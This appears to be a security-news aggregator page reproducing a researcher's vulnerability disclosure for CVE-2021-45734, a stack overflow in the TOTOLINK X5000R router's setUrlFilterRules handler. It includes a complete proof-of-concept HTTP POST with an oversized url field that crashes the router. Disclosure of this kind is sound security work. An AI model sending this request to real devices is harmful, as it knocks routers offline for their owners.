Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-45734: my_vuln/10.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a stack overflow in the function setUrlFilterRules. This vulnerability allows attackers to cause a Denial of Service (DoS) via the url parameter.

CVE
Open in Source
#vulnerability#ubuntu#linux#dos#js#git#java

TOTOLINK Vulnerability

Vendor:TOTOLINK

Product:X5000R

Version:X5000R_Firmware(V9.1.0u.6118_B20201102)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:[email protected],[email protected]

Vulnerability description

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recentl, allows remote attackers to crash the server.

Stack Overflow

In cstecgi.cgi binary:

In setUrlFilterRules function, url is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the url to crash the server.

The input has not been checked.And then,call the function nvram_set to store this input.

In rc binary:

Eventually, the initial input will be extracted and cause the stack overflow.

As you can see here,The length of the input array(v3) is only 256 bytes, we can tamper with the content of the url field, such as a very long string.After that, it will cause the function return address to be overwritten.

Supplement

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set url as aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa… , and the router will crash, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1677 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/advance/urlf.html Cookie: SESSION_ID=2:1420070644:2

{"url":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","addEffect":"1","topicurl":"setUrlFilterRules"}

Result

The target router crashes and cannot provide services correctly and persistently.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE